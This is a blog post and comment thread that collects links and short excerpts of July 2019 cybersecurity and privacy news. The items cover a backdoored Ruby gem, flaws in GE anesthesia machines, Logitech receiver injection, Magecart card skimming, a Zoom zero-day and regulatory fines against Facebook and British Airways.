This posting is here to collect cyber security news in July 2019.
I post links to security vulnerability news to comments of this article.
If you are interested in cyber security trends, read my Cyber security trends 2019 posting.
You are also free to post related links.
237 Comments
Tomi Engdahl says:
Kubernetes CLI tool security flaw lets attackers run code on host machine
Interesting bug can lead to total compromise of cloud production environments.
https://www.zdnet.com/article/kubernetes-cli-tool-security-flaw-lets-attackers-run-code-on-host-machine/
Tomi Engdahl says:
Facebook US data transfer case goes to Europe’s top court
https://nypost.com/2019/07/09/facebook-us-data-transfer-case-goes-to-europes-top-court/
Tomi Engdahl says:
Facebook: We valuate your privacy so much that we want you to give up some of it to make us money out of it.
Tomi Engdahl says:
https://blog.zoom.us/wordpress/2019/07/08/response-to-video-on-concern/
Tomi Engdahl says:
https://www.tripwire.com/state-of-security/government/new-york-law-expands-cyber-protection/
The New York State Legislature recently passed a bill that aims to protect New York residents, regardless of the location of the business. The law, known as the Stop Hacks and Improve Electronic Data Security (SHIELD) Act is designed to address unauthorized access of data.
Tomi Engdahl says:
https://www.infosecurity-magazine.com/news/magecart-blitz-stuns-962-ecommerce/
Tomi Engdahl says:
https://www.bbc.com/news/av/technology-48707033/ransomware-cyber-attacks-are-targeting-large-companies-and-demanding-huge-payments
Tomi Engdahl says:
https://www.redstate.com/setonmotley/2019/06/27/big-government-big-tech-partnering-track-us-everywhere/
Tomi Engdahl says:
https://www.engadget.com/2019/07/04/uk-met-facial-recognition-failure-rate/
Tomi Engdahl says:
Backdoor discovered in Ruby strong_password library
http://nakedsecurity.sophos.com/2019/07/09/backdoor-discovered-in-ruby-strong_password-library/
the mystery 0.0.7 version embedded a download link which:
Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.
The backdoor would download code from the Pastebin address for production sites, giving the attackers the power of remote code execution, silently hijacking any websites unfortunate to have updated to the rogue strong_password gem.
Tomi Engdahl says:
Huawei website ████ ██████ security flaws ██████ customer info and biz operations at risk: ███████ patched
Is this the Chinese giant’s Winnie the Pooh moment?
https://www.theregister.co.uk/2019/07/09/huawei_to_address_security_holes/
Tomi Engdahl says:
Flaws in hospital anesthesia and respiratory devices allow remote tampering
https://techcrunch.com/2019/07/09/flaws-anesthesia-respiratory-devices-tampering/
Security researchers have discovered vulnerabilities in two models of hospital anesthesia machines manufactured by General Electric (GE).
The two devices found to be vulnerable are GE Aestiva and GE Aespire — models 7100 and 7900.
“As long as the device is ported to the network through a terminal server, anyone familiar with the communication protocol can force a revert and send a variety of illegitimate commands to the machine,” he said.
Vulnerabilities found in GE anesthesia machines
https://www.zdnet.com/article/vulnerabilities-found-in-ge-anesthesia-machines/
GE recommends not connecting vulnerable anesthesia machines to hospital networks.
Tomi Engdahl says:
Intel Patches High-Severity Flaw in Processor Diagnostic Tool
https://threatpost.com/intel-patches-high-severity-flaw-in-processor-diagnostic-tool/146352/
Intel issued patches for a high-severity flaw in its processor diagnostic tool as well as a fix for a medium-severity vulnerability in its data center SSD lineup.
The Intel Processor Diagnostic tool is a free product that allows users to test and diagnose any issues in their processor before having to contact tech support.
Tomi Engdahl says:
Logitech Unifying Receivers Vulnerable to Key Injection Attacks
https://www.bleepingcomputer.com/news/security/logitech-unifying-receivers-vulnerable-to-key-injection-attacks/
Four new vulnerabilities were found to affect all Logitech’s Unifying USB receivers that allow users to connect up to six different compatible Logitech wireless presentation remotes, mice, and keyboards to the same computer via a 2.4 GHz radio connection.
Out of the four vulnerabilities found by Mengs, Logitech confirmed that they’ll only fix two of them
https://www.bettercap.org/modules/hid/
Tomi Engdahl says:
https://seclists.org/fulldisclosure/2019/Jul/12
Mozilla’s MSI installers: FUBAR (that’s spelled “fucked-up beyond all repair”)
Tomi Engdahl says:
Detroit’s facial recognition surveillance system exposed
https://www.wsws.org/en/articles/2019/07/09/face-j09.html
After the extent of the surveillance was exposed and public anger began to rise, Detroit Police Chief James Craig hastily called a press conference on June 27 in an effort to downplay the invasive nature of the system and justify its implementation.
Forced to admit that the artificial intelligence and biometrics system had been in place for the past two years without review
Tomi Engdahl says:
London Underground wi-fi data collection ‘has huge potential’
https://www.bbc.com/news/uk-england-london-48921411
From this week, Transport for London (TfL) is going to collect data anonymously through its wi-fi from our phones as we move about the network.
Instead of building new Tube lines or buying new trains, why not use our existing ones in a much more efficient smarter way?
You could get a message at every stage of your journey, or you could be given a different route to avoid overcrowding.
Tomi Engdahl says:
YouTube’s ‘instructional hacking’ ban threatens computer security teachers
YouTube now says takedown of a ‘white hat’ hacking channel was a mistake
https://www.theverge.com/2019/7/3/20681586/youtube-ban-instructional-hacking-phishing-videos-cyber-weapons-lab-strike
Tomi Engdahl says:
Bug in Anesthesia Machines Allows Changing Gas Mix Levels
https://www.bleepingcomputer.com/news/security/bug-in-anesthesia-machines-allows-changing-gas-mix-levels/
The flaw affects GE Aestiva and GE Aespire anesthesia systems, models 7100 and 7900, from GE Healthcare (part of General Electric Company) and permits sending them commands over the local network.
No authentication or special privileges needed
This downgrade attack would allow not only remotely adjusting the composition of the anesthetic gas mixture but also suppressing alarms, changing the time and date on the system, and modifying the barometric pressure.
Tomi Engdahl says:
Cybersecurity Experts Worry About Satellite & Space Systems
https://www.darkreading.com/attacks-breaches/cybersecurity-experts-worry-about-satellite-and-space-systems/d/d-id/1335131
Tomi Engdahl says:
Cybersecurity Experts Worry About Satellite & Space Systems
https://www.darkreading.com/attacks-breaches/cybersecurity-experts-worry-about-satellite-and-space-systems/d/d-id/1335131
As nation-states and rogue actors increasingly probe critical infrastructure, policy and technology experts worry that satellite and space systems are on the front lines.
Tomi Engdahl says:
Whoop whoop! Insane Clown Posse fans may have stumbled into a way to combat public surveillance
https://consequenceofsound.net/2019/07/juggalo-makeup-facial-recognition/amp/
Last year, Ticketmaster and LiveNation invested in a former military facial recognition company, with the hope that the technology could be used to both strengthen and speed up event entry. If that prospect thoroughly creeps you out, here’s a simple life-hack to defeat Big Brother: become a Juggalo. In a revelation that is sure to freak out the FBI, Insane Clown Posse’s passionate fan base have unintentionally unlocked the secret to thwarting facial recognition.
Tomi Engdahl says:
Many popular wireless keyboards completely unprotected
https://www.csoonline.com/article/3100026/many-popular-wireless-keyboards-completely-unprotected.html
Many popular wireless keyboards on the market today are vulnerable to eavesdropping
Tomi Engdahl says:
Apple co-founder thinks you should get off Facebook
https://nypost.com/2019/07/09/apple-co-founder-thinks-you-should-get-off-facebook/
Apple co-founder Steve Wozniak has some advice for most Facebook users: Delete your account.
“There are many different kinds of people, and some [of] the benefits of Facebook are worth the loss of privacy,” Wozniak told TMZ, which spoke with the tech mogul at Reagan National Airport in DC. “But too many like myself, my recommendation is — to most people — you should figure out a way to get off Facebook.”
Tomi Engdahl says:
Banned Chinese Security Cameras Are Almost Impossible to Remove
https://www.bloomberg.com/news/articles/2019-07-10/banned-chinese-security-cameras-are-almost-impossible-to-remove
An August deadline to remove them from federal agencies likely won’t be met as many departments don’t even know what cameras they’re using.
U.S. federal agencies have five weeks to rip out Chinese-made surveillance cameras in order to comply with a ban imposed by Congress last year in an effort to thwart the threat of spying from Beijing.
But thousands of the devices are still in place and chances are most won’t be removed before the Aug. 13 deadline. A complex web of supply chain logistics and licensing agreements make it almost impossible to know whether a security camera is actually made in China or contains components that would violate U.S. rules.
Tomi Engdahl says:
The amendment singles out Zhejiang Dahua Technology Co. and Hangzhou Hikvision Digital Technology Co., both of which have raised security concerns with the U.S. government and surveillance industry.
https://www.bloomberg.com/news/articles/2019-07-10/banned-chinese-security-cameras-are-almost-impossible-to-remove
Tomi Engdahl says:
Agent Smith Malware Infects 25M Android Phones to Push Rogue Ads
https://threatpost.com/malware-agent-smith-android-ads/146359/?utm_source=dlvr.it&utm_medium=twitter
Researchers say malware infects phones in order to sneak ads on devices for profit.
Tomi Engdahl says:
More than 1,000 Android apps harvest data even after you deny permissions
https://www.cnet.com/news/more-than-1000-android-apps-harvest-your-data-even-after-you-deny-permissions/
The apps gather information such as location, even after owners explicitly say no. Google says a fix won’t come until Android Q.
Tomi Engdahl says:
How to enable DNS-over-HTTPS (DoH) in Firefox
https://www.zdnet.com/article/how-to-enable-dns-over-https-doh-in-firefox/
A step by step guide to enable DNS-over-HTTPS (DoH) support in the Firefox browser.
Internet group brands Mozilla ‘internet villain’ for supporting DNS privacy feature
https://techcrunch.com/2019/07/05/isp-group-mozilla-internet-villain-dns-privacy/
Tomi Engdahl says:
Seriously, stop using RSA
https://blog.trailofbits.com/2019/07/08/fuck-rsa/
Let me save you a bit of time and money and just say outright—if you come to us with a codebase that uses RSA, you will be paying for the hour of time required for us to explain why you should stop using it.
RSA is an intrinsically fragile cryptosystem containing countless foot-guns which the average software engineer cannot be expected to avoid. Weak parameters can be difficult, if not impossible, to check, and its poor performance compels developers to take risky shortcuts. Even worse, padding oracle attacks remain rampant 20 years after they were discovered.
Tomi Engdahl says:
Google employees are eavesdropping, even in Flemish living rooms, VRT NWS has discovered
https://www.vrt.be/vrtnws/en/2019/07/10/google-employees-are-eavesdropping-even-in-flemish-living-rooms/
Google employees are systematically listening to audio files recorded by Google Home smart speakers and the Google Assistant smartphone app.
Tomi Engdahl says:
Australia’s anti-encryption laws being used to bypass journalist protections, expert says
https://www.theguardian.com/australia-news/2019/jul/08/australias-anti-encryption-laws-being-used-to-bypass-journalist-protections-expert-says
New legislation has given AFP ‘power to strike a chilling blow against press freedom’, cybersecurity researcher tells parliamentary review
Tomi Engdahl says:
British Airways faces record £183m fine for data breach
https://www.bbc.com/news/business-48905907
Tomi Engdahl says:
Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website
https://medium.com/bugbountywriteup/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5
Tomi Engdahl says:
The Most Clever ‘Zip Bomb’ Ever Made Explodes a 46MB File to 4.5 Petabytes
https://www.vice.com/en_us/article/597vzx/the-most-clever-zip-bomb-ever-made-explodes-a-46mb-file-to-45-petabytes?utm_source=vicefbus
Tomi Engdahl says:
Cyberattack lands ship in hot water
http://nakedsecurity.sophos.com/2019/07/11/cybersecurity-attack-lands-ship-in-hot-water/
Less than two months after warning of cybersecurity problems on ships, the US Coast Guard has revealed that a large international vessel has suffered a cyberattack.
On Monday 8 July 2019 the Coast Guard issued a Marine Safety Alert reporting a successful malware attack on a vessel back in February.
The alert describes the affected craft as a ‘deep draft’ vessel.
It experienced a “significant cyberincident” on its way to the Port of New York and New Jersey.
The crew avoided losing complete control of the ship, but it should be a wake-up call.
The crew did use the network for official business like updating electronic charts and managing cargo data, and members would routinely plug USB drives into the ship’s systems without scanning them for malware
Researchers have found problems with vessel cybersecurity in the past.
Tomi Engdahl says:
Hacked surveillance firm pitches NYC with invasive camera tech to track driver journeys
https://www.zdnet.com/article/hacked-surveillance-firm-pitches-nyc-with-ml-cameras-to-track-driver-journeys/
Scanning technology already in use at the Mexican border was pitched as a way to build profiles of driver habits.
Tomi Engdahl says:
EXCLUSIVE: Monroe College hacked, $2 million in Bitcoin demanded as ransom
https://www.nydailynews.com/new-york/nyc-crime/ny-monroe-college-hacked-bitcoin-20190711-uhmv5a4mz5gxja6od7lme37h7e-story.html
Tomi Engdahl says:
Good news. Samba 4.11 will be the next version of the Samba suite and SMB1 is disabled by default. SMB1 exploit were wild and unpatched system will still get rooted: https://github.com/samba-team/samba/blob/59cca4c5d699be80b4ed22b40d8914787415c507/WHATSNEW.txt
See how to disable SMB1 on Linux or Unix https://www.cyberciti.biz/faq/how-to-configure-samba-to-use-smbv2-and-disable-smbv1-on-linux-or-unix/ #OpenSource #security
Tomi Engdahl says:
‘World’s first Bluetooth hair straighteners’ can be easily hacked
https://techcrunch.com/2019/07/11/bluetooth-hair-straighteners-hacked/
Here’s a thing that should have never been a thing: Bluetooth-connected hair straighteners.
Glamoriser, a U.K. firm that bills itself as the maker of the “world’s first Bluetooth hair straighteners“, allows users to link the device to an app, which lets the owner set certain heat and style settings. The app can also be used to remotely switch off the straighteners within Bluetooth range.
Big problem, though. These straighteners can be hacked.
Tomi Engdahl says:
FTA: By exploiting CVE-2019-10915, a remote attacker could bypass HTTP authentication and access all administrator functionality by directly sending WebSocket commands to a server, Tenable says.
Why would these even need to be available via HTTP at all?
Researchers Disclose Vulnerability in Siemens’ ICS Software
https://www.govinfosecurity.com/researchers-disclose-vulnerability-in-siemens-ics-software-a-12765#.XSdVbDTnzPQ.facebook
Patch Issued in Light of Concerns Over Stuxnet-Like Attack Against Industrial Systems
Tomi Engdahl says:
Google is investigating the source of voice data leak, plans to update its privacy policies
https://techcrunch.com/2019/07/11/google-is-investigating-the-source-of-voice-data-leak-plans-to-update-its-privacy-policies/
The company, by way of a blog post, explained that it partners with language experts around the world who review and transcribe a “small set of queries” to help Google better understand various languages.
https://www.blog.google/products/assistant/more-information-about-our-processes-safeguard-speech-data/
Tomi Engdahl says:
Wi-Fi helped identify Maryland teens who drew racist, anti-Semitic graffiti at high school
http://www.fox5dc.com/news/local-news/wi-fi-helped-identify-maryland-teens-who-drew-racist-anti-semitic-graffiti-at-high-school
Tomi Engdahl says:
Over 17,000 Domains Infected with Code that Steals Card Data
https://www.bleepingcomputer.com/news/security/over-17-000-domains-infected-with-code-that-steals-card-data/
Cybercriminals running Magecart operations have added payment card skimming code to more than 17,000 domains with JavaScript files in misconfigured Amazon S3 buckets.
Tomi Engdahl says:
Japan cryptocurrency exchange loses $32 million of virtual money
https://nypost.com/2019/07/12/japan-cryptocurrency-exchange-loses-32-million-of-virtual-money/?utm_campaign=iosapp&utm_source=facebook_app
The reason for the losses, which include bitcoins as well as Ethereum, Ripple and other kinds of cryptocurrencies, is under investigation.
Bitcoin has been a legal form of payment in Japan since April 2017.
Tomi Engdahl says:
So it seems Mozilla is no longer going to be considered for an internet villainy award
“Mozilla aren’t villains after all” – ISPs back down after public outcry
https://nakedsecurity.sophos.com/2019/07/11/mozilla-arent-villains-after-all/
A few short days ago, we wrote up the news that Mozilla was up for an internet award…
…for cybervillainy!
Seems it was all down to Mozilla’s enthusiastic adoption of a system called DNS-over-HTTPS.
DNS-over-HTTPS: it’s a way of encrypting and authenticating your network lookups while you’re online.
your DNS list of “sites of interest” remains private, which in turns keeps you more secure against snooping, surveillance and sneaky substiutions.
OK, so there are various technical reasons why you might be against DNS-over-HTTPS
Mozilla would suddenly make the internet too secure! Too private! Too safe! Too well-protected from busybodies, snoops and crooks!
Horror of horrors!
British ISPs would no longer be able to collect and collate innocent users’ high-level internet browsing habits themselves just in case the data ever came in handy for busting ACTUAL CROOKS!
The ISPA has now officially and publicly backed down and taken Mozilla off the Internet Villainy shortlist.
Tomi Engdahl says:
Facebook to be slapped with $5 billion fine for privacy lapses, says WSJ
https://www.cnbc.com/2019/07/12/ftc-fines-facebook-5-billion-for-privacy-lapses.html?__source=facebook%7Cmain
The Federal Trade Commission announced a settlement with Facebook over the company’s 2018 Cambridge Analytica scandal.
The fine represents the largest ever imposed by the FTC against a tech company.
Tomi Engdahl says:
Train maker’s coder goes loco, choo-choo-chooses to flee to China with top-secret code – allegedly
https://www.theregister.co.uk/2019/07/12/train_software_theft/
Xudong “William” Yao stole the software blueprints from his former employer, an unnamed locomotive manufacturer based in Chicago, it is claimed, flew to the Middle Kingdom, and took up a job with a Chinese biz that specializes in automotive telematics – think vehicle monitoring, tracking, and communications.
Tomi Engdahl says:
T-Mobile quietly reported a sharp rise in police demands for cell tower data
https://techcrunch.com/2019/07/12/t-mobile-cell-tower-government-demands/
Tomi Engdahl says:
Confirmed: Microsoft Windows Zero-Day Exploit Used In Government Espionage Operation
https://www.forbes.com/sites/daveywinder/2019/07/12/confirmed-microsoft-windows-zero-day-exploit-used-in-government-espionage-operation/
The highly targeted attacks against government institutions in Eastern Europe, which took place during June 2019, employed the use of a Microsoft Windows zero-day exploit. In and of itself this isn’t unusual as there have been plenty of Windows zero-days discovered